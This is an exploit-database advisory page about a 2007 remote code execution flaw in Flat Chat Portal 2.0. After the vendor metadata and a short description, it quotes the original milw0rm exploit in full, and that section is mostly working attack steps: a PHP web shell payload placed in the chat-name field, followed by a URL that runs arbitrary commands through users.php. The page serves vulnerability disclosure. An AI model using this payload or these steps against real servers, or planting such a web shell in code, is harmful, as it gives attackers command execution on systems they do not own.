header-logo
Suggest Exploit
vendor:
Flat Chat Portal
by:
Dj7xpl
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Flat Chat Portal
Affected Version From: 2
Affected Version To: 2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Flat Chat Portal Remote Code Execution

The Flat Chat Portal version 2.0 is vulnerable to remote code execution. An attacker can exploit this vulnerability by inserting a malicious script in the chat name parameter. By executing commands through the 'cmd' parameter in the users.php page, the attacker can execute arbitrary code on the system.

Mitigation:

Upgrade to a patched version of the Flat Chat Portal or apply necessary security measures to prevent remote code execution.
Source

Exploit-DB raw data:

                                           .-""""""""-.                                 
                                          /   Dj7xpl   \                              
                                         |              |                                
                                         |,  .-.  .-.  ,|                                
                                         | )(_o/  \o_)( |                                     
                                         |/     /\     \|                                 
                               (@_       (_     ^^     _)                  
                          _     ) \_______\__|IIIIII|__/_______________________________
                         (_)@8@8{}<________|-\IIIIII/-|________________________________>
                                )_/        \          / 
                                (@
+_______________________________________________________________________________________________________________________+
+
+
+                               +=============================================+
+                               |                                             |
+                               | Portal   : Flat Chat                        |
+                               | Version  : 2.0                              |
+                               | Author   : Dj7xpl  | Dj7xpl@yahoo.com       |
+                               | Download : Http://www.undoweb.frih.net      |
+                               | Risk     : High (Remote Code Execution)     |
+                               |                                             |
+                               +=============================================+
+
+              Exploit : 
+                         Http://localhost/flatchat/index.php   <<<<<<  Open Index Page
+
+                         Insert This Script In Chat Name:  e.g:  <?php passthru($_GET[cmd]); ?>
+
+                         Http://localhost/flatchat/users.php?cmd=ls -la   <<<  Enter Your Command
+                                                                              				            	  
+_______________________________________________________________________________________________________________________+

# milw0rm.com [2007-03-07]